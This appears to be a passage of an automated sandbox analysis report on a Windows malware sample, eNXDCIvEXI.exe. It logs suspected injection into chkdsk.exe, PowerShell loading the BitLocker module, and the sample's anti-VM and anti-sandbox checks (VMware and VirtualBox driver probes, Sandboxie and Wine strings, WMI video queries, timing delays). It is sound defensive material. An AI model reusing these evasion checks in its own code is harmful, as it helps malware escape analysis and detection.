Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0080E600 push esp; retf	12_2_0080E650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_008018F8 push es; ret	12_2_008018FD
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0081A90C push 69F0026Ch; retf	12_2_0081A91B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0081AA4D pushad ; retf	12_2_0081AA6A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00820B9C push cs; iretd	12_2_00820BD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_00801C71 push esp; retf	12_2_00801C87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0080DD95 push esp; ret	12_2_0080DD96
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0081FDC3 push ss; iretd	12_2_0081FDD4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0081FFA7 push edi; ret	12_2_0081FFB8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0081FFB0 push edi; ret	12_2_0081FFB8

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: eNXDCIvEXI.exe PID: 7344, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B80340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLP
Source: eNXDCIvEXI.exe, 00000000.00000002.1880140655.0000021B8008A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAMEP

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory allocated: 21BF61F0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Memory allocated: 21BF7BE0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	File opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	File opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\eNXDCIvEXI.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe

Code function: 5_2_0554D1C0 rdtsc

5_2_0554D1C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2275	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7489	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 3823	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 6149	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\chkdsk.exe	API coverage: 3.0 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
